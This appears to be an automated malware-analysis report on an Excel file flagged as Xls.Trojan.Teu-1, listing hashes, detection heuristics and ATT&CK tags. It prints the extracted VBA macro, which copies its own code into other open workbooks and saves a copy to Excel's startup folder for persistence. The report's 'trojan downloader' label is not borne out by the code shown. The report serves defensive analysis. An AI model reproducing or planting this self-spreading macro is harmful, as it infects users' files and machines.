Xls.Trojan.Teu-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 9832dca123176576…

MALICIOUS

Office (OLE)

Size: 17.0 KB
Created: 2000-01-17 23:30:21
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: b592e68581f9461dc324b92b6104def5
SHA-1: d5c248483c4e3788eac4295d3863d4287f2c2c26
SHA-256: 9832dca12317657694da3212f19ba32530c7f8a729568a24cbd5e4901515603e
Risk Score: 80

Malware Insights

Xls.Trojan.Teu-1 · confidence 85%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

This Excel file contains VBA macros that ClamAV detects as malicious. The macro code attempts to save the workbook as "Book1." in Excel's startup folder (Application.StartupPath), potentially to establish persistence. The heuristic firings and the nature of the macro code suggest a trojan downloader.

Heuristics (2)

  • ClamAV: Xls.Trojan.Teu-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Teu-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1750 bytes
SHA-256: f18237dd0803b88758ff3f8293481eca7988a0c70bf0fdf9ee3e1c44bdf5e75a
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Sub WorkBook_Deactivate()
'klteu17
Set teu20217 = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set be1720217 = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If teu20217.Lines(2, 1) <> "'" Then
teu20217.deletelines 1, teu20217.countoflines
teu20217.insertlines 1, be1720217.Lines(1, Var.countoflines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
End If
End Sub